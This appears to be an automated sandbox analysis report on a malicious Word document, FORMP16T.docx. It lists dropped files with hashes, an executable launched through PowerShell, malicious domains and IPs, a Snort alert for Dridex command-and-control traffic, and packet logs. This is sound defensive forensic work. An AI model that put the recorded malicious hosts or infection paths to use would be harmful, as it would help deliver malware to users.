                SHA-256:1F2CCF4F8DF0644BD62DF930437BD76B1AD95F7359F06A6D3E0C9192550DECD2
                SHA-512:D88205CBEB4C9D25CB374A327EE90DAF494FDCADCA9166218D9F32931B35BF69734BEBB2497BB789EEE3706FECEF8B93EE66F55B43241321F074677C83055862
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1DBC562.png
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:PNG image, 814 x 428, 8-bit/color RGB, non-interlaced
                Size (bytes):5505
                Entropy (8bit):4.862545504455395
                Encrypted:false
                MD5:EC8F26065F36D52BA686E579FAF684C7
                SHA1:A2B82571B4380EBB725A904293674F811D3C6F0F
                SHA-256:B56FC1B19FE57538A571E455FD5B17EFCB800BF746C63A8DF522ACF856EAC4FA
                SHA-512:5EB07DAB86732C4273B7C20292BDB284B0812F8C997E2739DBAC38053A0DB3A6931046213A5569CE1AAC3C0832B4AAB2646B2684A4E48558D7208D9F40E72A8E
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{384E1BD3-7400-470C-B3DC-F5038CCAA836}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):2560
                Entropy (8bit):2.5735364382363324
                Encrypted:false
                MD5:39D6429B4FA6E4A3EB57EEDFA48792B7
                SHA1:5BA01408169FEEF05041B3E305D779DCB6292E0C
                SHA-256:73134D23D9D1080C982412ED04A29EFD7C7F14F0B67E23F420CA6781BA25ABDF
                SHA-512:25FB4CFF0BFF1ABD7178D614FBD2B022DB16A5528013FA3DCD49C6BD12139F69EECFD031DA2E61CAB629C71D0B4364CE3DB6EC159191BBC6A7B392155BCF977B
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7F01E0AB-1877-4309-9FF2-E450448C9908}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B0F4FAC3-A519-4D8E-8AA8-C8135F37FD86}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):1536
                Entropy (8bit):2.6737149006886534
                Encrypted:false
                MD5:D9449E562F822B38BEC7E815175C54E8
                SHA1:CBFAE6FC61B8F880CB3A4FCCB4D05F35198CDBDE
                SHA-256:E0CF56CE9C83B47A100050383853E592521CCCD7CD93833397274CA308FE1F4B
                SHA-512:FA577955335A21286C5FE782865F49D169B6FB411F77510FC48628FD392F8855C7EB3AD691D1E0F9E83F221F727602756F14BA807B5B1B130691E793A0FBC38D
                Malicious:false
                C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
                Size (bytes):270387
                Entropy (8bit):7.404283344284438
                Encrypted:false
                MD5:A5EB363D44116B6CECB2AA7527FD7A6A
                SHA1:3D43576AAB02A16970A5717453D81F978A686119
                SHA-256:492AAF70E95987373A3C01F6AFA10C9F064D756871D6B02D7F65E03E70E92AC9
                SHA-512:87462A0DFA8D58849CE2D06BE3374C199FE943341CFFB34870698252EA93978EFEC5E016A78AF9432794F821B3837C009EB15C86F7A6EC5118F5E1F87B63583C
                Malicious:true
                Joe Sandbox View:
                • Filename: , Detection: malicious, Browse
                • Filename: log.exe, Detection: malicious, Browse
                • Filename: FORMP16T.docx, Detection: malicious, Browse
                C:\Users\user\AppData\Local\Temp\{3D2CEBA6-A347-4CB9-83D7-058FF2ED1EAA}
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):137348
                Entropy (8bit):0.05952738608421197
                Encrypted:false
                MD5:5D859794480AFB30484C8C21FCA69A25
                SHA1:117E4A1FA9986C8597A80C2FE4CE776B294FBD19
                SHA-256:072A5188F96A0E48DE5B6D850FED17C1231E0777C0F0593714F1846731FE3AA5
                SHA-512:91EC29284224D3B95E9C8A2BD46AFACE90F34358A000CCDCC0F6775A148C54E2445E67972B7B5A4625B98993846C4E799CC1781D6736A23157EFE94B33BE8B0E
                Malicious:false
                C:\Users\user\AppData\Local\Temp\{4C7EFF2B-DE41-4635-9BB9-3053B2B6A867}
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):137348
                Entropy (8bit):0.05953988760186431
                Encrypted:false
                MD5:BB7F76B62D1FE392E35D95CE409ABB75
                SHA1:4C04F6F83CC9D966BFADC598F9D5C5C8A7C0CCD2
                SHA-256:8AFF0069A4F9AFC0C25214EEB164FE0AAD0588A5161DBDFA0560B8DB85653DB5
                SHA-512:AF21B27EFDD838CEB5B237A2441CAFF522043C5CBF5F7671F644CE4EC700189768DC2EF8623B52C39C12354DF6346E1E5821F4B1B0730C32F45527E3970B8625
                Malicious:false
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\FORMP16T.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut
                Size (bytes):2056
                Entropy (8bit):4.541608860559977
                Encrypted:false
                MD5:F8B14C4BC4D447089B61D1718D02155E
                SHA1:6E62D20FF058319D34A03BDEB4463A6C565ABAB7
                SHA-256:5EFD9C639C906AB5B0D720573A892FB4F833BA570883F1FC6CDA41F52CE2F3B9
                SHA-512:95A55C685DC2C489BD031689495361F5D19DCFC093A8B15E74EFCE01A952641E30010B2DC4172B2CAAEEE064B891A615206C2262981C5576DE73737AE7E13B44
                Malicious:false
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\cypruscars4u.com.url
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows 95 Internet shortcut text (URL=< >)
                Size (bytes):50
                Entropy (8bit):4.5034651896016475
                Encrypted:false
                MD5:9DFC09DD1BC19A7212ABB9B9B93D4D3E
                SHA1:080D8B2EA51C0DF333F2A2C5EAA6F0017F3B8F5B
                SHA-256:085EFF9EDDF8AEC945C551A43B5CD5197410B6E4A335539E902E922E10F190E5
                SHA-512:29C836F2980A95F38690421AA8E2C675B9B644CEC787382D4B3554AB98E722D69DC5DA2DDF0449487A740323D0A1A7A22F44BDFFCABFE2A876920EA204A6A915
                Malicious:false
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Size (bytes):127
                Entropy (8bit):4.94445432505334
                Encrypted:false
                MD5:E681C1C28E712F4111D737CD758E4895
                SHA1:DFA0180894A8E10119324FDEDC242CC50D466E67
                SHA-256:BDB856964CF83E7C2F39FA3BAB4FC1DFA559B2050C771C105C173AF80928A971
                SHA-512:DA1BAF0D6DC57FB9FC8937C2053125A08CFAC8436B1ED8328C4A976EF09E33BBE06B9F8E6C017893D23482BF4B9BDB76E32F238DD086F3F61D7D387DBA800814
                Malicious:false
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\logo.jpg.url
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows 95 Internet shortcut text (URL=< >)
                Size (bytes):58
                Entropy (8bit):4.654973451837617
                Encrypted:false
                MD5:042B9ADE4DDDCAEDA19952D8E956D29F
                SHA1:EA3F7A76BC24EDF1B83BD49EC13C25E33ECECAFA
                SHA-256:99F8893F0ADC5741DC60BE43A749B325537F0CEB1DE065AF493BFCCF8C8E0E0E
                SHA-512:A6B92D96A6B054587A09A5679F22025937BE169394BE3715C84503BB8A3E8487F4CAF1ECB4487E7515EF06F2BE28DE97EC0AF596FCA1A9FBA5D7A767B1D6EBBD
                Malicious:false
                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):162
                Entropy (8bit):2.9833602514795796
                Encrypted:false
                MD5:0385F897CB2FDFF5D96731D517AEECEC
                SHA1:41C7F3DC326798CB343DF2018CB4579CAA3D49DB
                SHA-256:AA5050FC25F8609280944F388E93E42CE810CEA051791168C88E595036AABA5F
                SHA-512:DF081C7E98B807C4F0813DB9ECCFB567EF556555194B7F9F0606D0C25EFAEB0D89FDCDF9BE21CB69592C46ECD4E1B389E7F7DE4C2F2FFC8EBF7E91642E77FDC6
                Malicious:false
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R89YL6WT7152KKXNY024.temp
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Size (bytes):8016
                Entropy (8bit):3.5523474608905365
                Encrypted:false
                MD5:B6E4720900797B26D62677FDD493F8DF
                SHA1:DAA4A9E483A0504FDFF1490142F68E9F2DD5A192
                SHA-256:6BDB4BB6AF85E9617CBDA0141F5CAE837D5873D17D28380D942A1EF30CF1AD82
                SHA-512:7B64F6CD45A8F0BA20CF9D1558DA42A88557E4A93C906208C45A5D5EEA46820E5E5DBC19D86784A763107207657EEAE9E7ED4878081409264E86B89374D322C4
                Malicious:false
                C:\Users\user\AppData\Roaming\freenet\FAQ
                Process:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                File Type:data
                Size (bytes):96
                Entropy (8bit):2.952623008146999
                Encrypted:false
                MD5:E682DB375DD0780AFCDC3A38FC134EDD
                SHA1:5C585B9531B5B80D5602AFAF82826EC6664CD8F6
                SHA-256:CE1DB85A7011056A0B9F88576A6A445BA3C87D207D9204C26AFAFE8310CE0B56
                SHA-512:297686F70E3C2015025BCE10A4E4131842B03B8D2574F029AEAE1328BBFFFFAF71EB49D68B9DC546EC435EE46E6D979D15C2CEFE89FC3E3D2495D1CBC62B3EC4
                Malicious:false
                C:\Users\user\AppData\Roaming\freenet\Modules\systeminfo32
                Process:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                File Type:data
                Size (bytes):87216
                Entropy (8bit):7.99816202635642
                Encrypted:true
                MD5:B3A9D059584418A2A0803FB0C6753EA9
                SHA1:D19EF63CCEF78C785CBDE5008FBFE7721625D02F
                SHA-256:70DCCAA8296D3101E33F952EB2A927A21F428786F1F8DB724EAF918408E348CF
                SHA-512:51C13E5D6C91341A158A40D746E929433B78F39BE48B3705D3E0B172CDCFDE677B008F58FC938C06AE93D8157008D28ED3C662811A720DC42E203FAB34A9D2DC
                Malicious:true
                C:\Users\user\AppData\Roaming\freenet\README.md
                Process:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                File Type:data
                Size (bytes):16
                Entropy (8bit):2.091917186688699
                Encrypted:false
                MD5:6181181AF3D12FFB94B78A3EE28FEAE3
                SHA1:5095813630D7FB87A1A26D71C21E635E551A3A8D
                SHA-256:1B8D81C6864285856EE18FAB3DC48CF610E8B6DADB8EDC1EC08EABC0DFA168E4
                SHA-512:02F1591E216E9ACEF2873996E4164DBC20B2059A0AB70AF0E592B888D145DBCCCBB0D7799170ECE00A2C1DF940DFA7105150D7F834EBD06230DF99557A5CFA5D
                Malicious:false
                C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                Process:C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
                File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
                Size (bytes):270387
                Entropy (8bit):7.404283344284438
                Encrypted:false
                MD5:A5EB363D44116B6CECB2AA7527FD7A6A
                SHA1:3D43576AAB02A16970A5717453D81F978A686119
                SHA-256:492AAF70E95987373A3C01F6AFA10C9F064D756871D6B02D7F65E03E70E92AC9
                SHA-512:87462A0DFA8D58849CE2D06BE3374C199FE943341CFFB34870698252EA93978EFEC5E016A78AF9432794F821B3837C009EB15C86F7A6EC5118F5E1F87B63583C
                Malicious:true
                Joe Sandbox View:
                • Filename: , Detection: malicious, Browse
                • Filename: log.exe, Detection: malicious, Browse
                • Filename: FORMP16T.docx, Detection: malicious, Browse
                C:\Users\user\Desktop\~$RMP16T.docx
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):162
                Entropy (8bit):2.9833602514795796
                Encrypted:false
                MD5:0385F897CB2FDFF5D96731D517AEECEC
                SHA1:41C7F3DC326798CB343DF2018CB4579CAA3D49DB
                SHA-256:AA5050FC25F8609280944F388E93E42CE810CEA051791168C88E595036AABA5F
                SHA-512:DF081C7E98B807C4F0813DB9ECCFB567EF556555194B7F9F0606D0C25EFAEB0D89FDCDF9BE21CB69592C46ECD4E1B389E7F7DE4C2F2FFC8EBF7E91642E77FDC6
                Malicious:false
                C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                File Type:Microsoft Cabinet archive data, 53748 bytes, 1 file
                Size (bytes):107496
                Entropy (8bit):7.995311414574702
                Encrypted:true
                MD5:EA03AEEAA3343AF083EC6A40717AA4FB
                SHA1:39622FBE41944B9817E27AD579173C135E41988B
                SHA-256:5B41FA5F62A5D6270F93D5BAC8C670BA692A75F3195F382514E984236CE20CE5
                SHA-512:2303583F9324A3D1C924FF8A767DB114F50A4DFB986784AB049740FF5917BAFC029EC7947FAC750722EA40AAF4B8C20930D6EFC29D94324478AEE30025E36E99
                Malicious:false
                C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                File Type:data
                Size (bytes):660
                Entropy (8bit):3.1295797772172023
                Encrypted:false
                MD5:0BA9F563F21686E45482384C5691EE0E
                SHA1:B6BFC818E8F99FE87D4BEA105D1E25EA3D99E964
                SHA-256:7E03515CFB42D3EB16716D46C718A98CEAE50A26D02876896E7669BE6BA0D277
                SHA-512:F35B31E8DA1818CF5F533E0BF838F9359AFA5FA0A97187F926D577405E816E175375BAA1914C3F8FE2F825A05E848E6A94AD921A86C49FEFECBB0D61245FEB15
                Malicious:false
                C:\Windows\Temp\VBB688.tmp
                Process:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                File Type:CDF V2 Document, corrupt: Cannot read summary info
                Size (bytes):32768
                Entropy (8bit):7.103203419688449
                Encrypted:false
                MD5:B8AFD98281FF1377DA72ACF8E8FB09A0
                SHA1:E08D2C5659A68BA73E727EFE4DED3FCE59A249E2
                SHA-256:CC68ED6421653E63A8196F8D4BD9F45D0EF478E658578756A55E49F35ECB20C2
                SHA-512:58781843D1E0322BA12A3AA5786EF4936CE5CD4BD1D25BF32D91E223D5FF228DDBFE5A6840940B51B328F4E8788DB461E8F9CF50FF6F74D3B2E1E338271BD2FC
                Malicious:false
                \DAV RPC SERVICE
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:GLS_BINARY_LSB_FIRST
                Size (bytes):232
                Entropy (8bit):4.20940736384572
                Encrypted:false
                MD5:7422EDFA6EAF21D37BAA922C7E2AF23A
                SHA1:4E5B4B594F76A4D0CEFC53723AB1742EA03BA711
                SHA-256:0C27F934457C6F03E5B424EF7115D641F487631B3D4DCDE4748BFD553C98A25B
                SHA-512:42438BE36AAACE63C160EA698FA23DEBA73D0D73841933ADB5A77A59C00CA7F565D772B8934AB0A4F305F1DFE2E1C72EB00A0EC3B2C8186D09BBF6F4F3F41FD0
                Malicious:false
                \OfficeUser_1f3d3cf5-9984-4ee7-99f2-d3c9e5b287fa
                Process:C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE
                File Type:data
                Size (bytes):168
                Entropy (8bit):1.6178682016203876
                Encrypted:false
                MD5:C09D374C573BE8800E2E8B6604E31859
                SHA1:E4E109C3F99096372377138A75014AE425E66383
                SHA-256:5EF6F02E6761B7DEFAC05000E439052421063FD59377EAC554FD712399A22E64
                SHA-512:8B0346195FD4DB46F89EB5F8E383993322F4B25B13BC3D81CAE6EA466ED4678B79637241065097B2AADAFC3D40D1C25F03C3D922D677F830A5C14A4800DD2CB0
                Malicious:false

                Contacted Domains/Contacted IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                figs4u.co.uk87.247.241.143truetruelow
                ipinfo.io216.239.34.21truefalsehigh
                cypruscars4u.com87.247.241.143truetruelow

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPCountryFlagASNASN NameMalicious
                92.55.251.211Poland
                42739FONE-ASNPLtrue
                87.247.241.143United Kingdom
                57173GOSIS-ASFRtrue
                216.239.34.21United States
                15169GOOGLE-GoogleIncUSfalse
                82.202.221.37Russian Federation
                49505SELECTELRUtrue

                Private

                IP

                Static File Info

                General

                File type:Zip archive data, at least v2.0 to extract
                Entropy (8bit):7.595189609687529
                TrID:
                • Word Microsoft Office Open XML Format document (41004/1) 91.10%
                • ZIP compressed archive (4004/1) 8.90%
                File name:FORMP16T.docx
                File size:34438
                MD5:70162476205496513fd88e9069372e53
                SHA1:a8a1438d1c6f7720f2fe5083519f5a53ac01ffcc
                SHA256:a372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3
                SHA512:747e78c23e81028e9d201f908e568352e92d450f185f3ed6448d4a5acbc8f356544cf39ab430f580ec0557cb532e5fd5674c230fb49fe5bdd2e4af446662dd84
                File Content Preview:PK..........!..A.._...........docProps/app.xml ...(............................................................................................................................................................................................................

                File Icon

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                05/25/18-16:09:19.249706TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC)4474919782.202.221.37192.168.1.16

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Mai 25, 2018 16:04:03.729567051 MESZ5697553192.168.1.168.8.8.8
                Mai 25, 2018 16:04:04.004415035 MESZ53569758.8.8.8192.168.1.16
                Mai 25, 2018 16:04:04.094546080 MESZ4918880192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:04.094609976 MESZ804918887.247.241.143192.168.1.16
                Mai 25, 2018 16:04:04.094686031 MESZ4918880192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:04.095504999 MESZ4918880192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:04.095530033 MESZ804918887.247.241.143192.168.1.16
                Mai 25, 2018 16:04:04.198158979 MESZ804918887.247.241.143192.168.1.16
                Mai 25, 2018 16:04:04.198348045 MESZ4918880192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:04.917773008 MESZ5120853192.168.1.168.8.8.8
                Mai 25, 2018 16:04:05.048067093 MESZ53512088.8.8.8192.168.1.16
                Mai 25, 2018 16:04:05.056689978 MESZ6222853192.168.1.168.8.8.8
                Mai 25, 2018 16:04:05.186736107 MESZ53622288.8.8.8192.168.1.16
                Mai 25, 2018 16:04:05.189137936 MESZ4918980192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:05.189234972 MESZ804918987.247.241.143192.168.1.16
                Mai 25, 2018 16:04:05.189368010 MESZ4918980192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:05.189836979 MESZ4918980192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:05.189867973 MESZ804918987.247.241.143192.168.1.16
                Mai 25, 2018 16:04:05.301259041 MESZ804918987.247.241.143192.168.1.16
                Mai 25, 2018 16:04:05.503052950 MESZ804918987.247.241.143192.168.1.16
                Mai 25, 2018 16:04:05.503177881 MESZ4918980192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:09.196559906 MESZ804918887.247.241.143192.168.1.16
                Mai 25, 2018 16:04:09.196705103 MESZ4918880192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:10.307883024 MESZ804918987.247.241.143192.168.1.16
                Mai 25, 2018 16:04:10.308038950 MESZ4918980192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:10.537914038 MESZ4918980192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:10.537981987 MESZ804918987.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.249743938 MESZ5865953192.168.1.168.8.8.8
                Mai 25, 2018 16:04:14.400018930 MESZ53586598.8.8.8192.168.1.16
                Mai 25, 2018 16:04:14.404015064 MESZ5691753192.168.1.168.8.8.8
                Mai 25, 2018 16:04:14.562123060 MESZ53569178.8.8.8192.168.1.16
                Mai 25, 2018 16:04:14.562791109 MESZ4919080192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:14.562834978 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.562949896 MESZ4919080192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:14.563160896 MESZ4919080192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:14.563179016 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.686031103 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.687855959 MESZ4919080192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:14.687895060 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.754057884 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.758125067 MESZ4919080192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:14.758160114 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.821834087 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.823277950 MESZ4919080192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:14.823313951 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.905404091 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.912440062 MESZ4919080192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:14.912480116 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.987792015 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:14.989383936 MESZ4919080192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:14.989419937 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.065145969 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.266997099 MESZ804919087.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.267302990 MESZ4919080192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.342600107 MESZ4918880192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.342675924 MESZ804918887.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.344258070 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.344302893 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.347111940 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.348134995 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.348161936 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.444607019 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.444644928 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.444658995 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.444705009 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.444871902 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.445514917 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.445602894 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.447355986 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.447390079 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.447398901 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.447443008 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.447880983 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.456495047 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.456512928 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.456527948 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.456608057 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.457494020 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.457568884 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.459269047 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.459289074 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.459379911 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.468738079 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.468759060 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.468770027 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.468846083 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.468853951 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.468858957 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.468867064 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.468878984 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.468895912 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.469127893 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.471623898 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.471643925 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.471657038 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.471702099 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.471724033 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.471740007 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.471750021 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.471759081 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.471795082 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.471801996 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.471817017 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.471975088 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.473071098 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.481856108 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.481888056 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.481909037 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.481965065 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.482001066 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482039928 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482053995 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482070923 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482115984 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.482135057 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482153893 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482168913 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482182026 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482249022 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.482259035 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482270956 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482280016 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482295036 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.482346058 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.483432055 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.484572887 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.484591007 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.484689951 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.484889984 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.525974035 MESZ804919187.247.241.143192.168.1.16
                Mai 25, 2018 16:04:15.526122093 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.546453953 MESZ4919180192.168.1.1687.247.241.143
                Mai 25, 2018 16:04:15.546511889 MESZ804919187.247.241.143192.168.1.16
